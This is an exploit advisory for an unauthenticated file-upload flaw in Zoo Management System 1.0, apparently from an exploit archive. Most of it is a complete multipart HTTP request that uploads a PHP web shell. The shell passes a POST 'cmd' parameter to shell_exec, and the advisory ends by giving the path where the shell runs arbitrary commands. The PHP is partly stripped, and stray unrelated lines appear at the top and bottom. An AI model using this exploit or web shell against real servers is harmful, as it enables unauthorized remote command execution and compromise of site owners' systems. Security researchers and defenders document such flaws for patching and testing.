Zoo Management System 1.0 Shell Upload – Torchsec
https://www.ispeech.org/text.to.speech
# Date: 16.10.2023
# Exploit Author: Çağatay Ceyhan
# Vendor Homepage: https://www.sourcecodester.com/php/15347/zoo-management-system-source-code-php-mysql-database.html#google_vignette
# Software Link: https://www.sourcecodester.com/download-code?nid=15347&title=Zoo+Management+System+source+code+in+PHP+with+MySQL+Database
# Version: 1.0
# Tested on: Windows 11
## Unauthenticated users can access /zoomanagementsystem/admin/public_html/save_animal address and they can upload malicious php file instead of animal picture image without any authentication.
POST /zoomanagementsystem/admin/public_html/save_animal HTTP/1.1
Host: localhost
Content-Length: 6162
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="117", "Not;A=Brand";v="8"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8NY8zT5dXIloiUML
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/zoomanagementsystem/admin/public_html/save_animal
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="animal_id"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_given_name"
kdkd
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_species_name"
ıdsıd
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_dob"
1552-02-05
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_gender"
m
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_avg_lifespan"
3
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="class_id"
2
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="location_id"
2
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_dietary_req"
2
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_natural_habitat"
faad
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_pop_dist"
eterter
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_joindate"
5559-02-06
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_height"
2
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_weight"
3
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_description"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="images[]"; filename="ultra.php"
Content-Type: application/octet-stream
if (!empty($_POST['cmd'])) {
$cmd = shell_exec($_POST['cmd']);
}
?>
body {
font-family: sans-serif;
color: rgba(0, 0, 0, .75);
}
main {
margin: auto;
max-width: 850px;
}
pre,
input,
button {
padding: 10px;
border-radius: 5px;
background-color: #efefef;
}
label {
display: block;
}
input {
width: 100%;
background-color: #efefef;
border: 2px solid transparent;
}
input:focus {
outline: none;
background: transparent;
border: 2px solid #e6e6e6;
}
button {
border: none;
cursor: pointer;
margin-left: 5px;
}
button:hover {
background-color: #e6e6e6;
}
.form-group {
display: -webkit-box;
display: -ms-flexbox;
display: flex;
padding: 15px 0;
}
Web Shell
Execute a command
Output
No result.
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_med_record"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_transfer"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_transfer_reason"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_death_date"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_death_cause"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_incineration"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="m_gest_period"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="m_category"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="m_avg_body_temp"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="b_nest_const"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="b_clutch_size"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="b_wingspan"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="b_color_variant"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="f_body_temp"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="f_water_type"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="f_color_variant"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="rep_type"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="clutch_size"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="num_offspring"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="submit"
------WebKitFormBoundary8NY8zT5dXIloiUML--
## After the post request sent by an attacker, the malicious file can be seen under the http://localhost/zoomanagementsystem/img/animals/. the attacker can execute arbitrary command on http://localhost/zoomanagementsystem/img/animals/ultra_1697442648.php.
Gloss